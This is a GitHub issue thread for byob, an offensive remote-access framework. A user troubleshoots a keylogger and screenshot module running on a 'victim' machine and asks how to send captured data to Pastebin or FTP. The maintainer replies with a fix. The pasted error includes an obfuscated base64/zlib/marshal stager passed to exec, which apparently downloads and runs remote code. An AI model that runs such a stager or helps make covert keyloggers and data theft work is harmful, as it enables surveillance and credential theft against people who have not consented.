### ISSUE TITLE
byob keylogger problem

### ISSUE THREAD

**Issue by user568989** [malwaredllc/byob#70]
1. when i start keylogger i dont see the logs in the data folder there is a file.txt but blank..
2. how can i connect to my pastebin\FTP account? just with username and password?

![screenshot 3](https://user-images.githubusercontent.com/42979542/47954923-9e882b00-df4d-11e8-9cc4-d511e9566491.png)

![screenshot 4](https://user-images.githubusercontent.com/42979542/47954924-a21bb200-df4d-11e8-9567-e4aa2cfc7921.png)

how to make keylogger work?

i run on kali machine the server and the client since when i run the server on kali and client on windows 7 i get an error:

File "byob_hH2.py", line 1, in <module>
    import zlib,base64,marshal,urllib;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrtmFgYCgtysnJTNIDUvkFqXka6hklJQVW+voGemBoZWhsbKmvX1ySmJ5aVKyf6hmoV1CprqlXlJqYoqEJAIT3E28=')))))
  File "<string>", line 1
    <head>
.....

**Comment by malwaredllc** [comment]
Thank you for bringing this bug to my attention - I just pushed an update that should fix it, so try again with a fresh install and let me know if works for you now.

**Comment by user568989** [comment]
hey man i re-installed the script moved to trash and then deleted it, like
you said and it did not work...
for now i dont get an error but the keylogger start and showed something
like: total - 0 bytes
and nothing ....
the victim types any keystrokes and it sill 0 bytes
screenshot module also has a problem and not taking any screenshot and save
them to data folder...
strange, maybe worth to look at the script again....
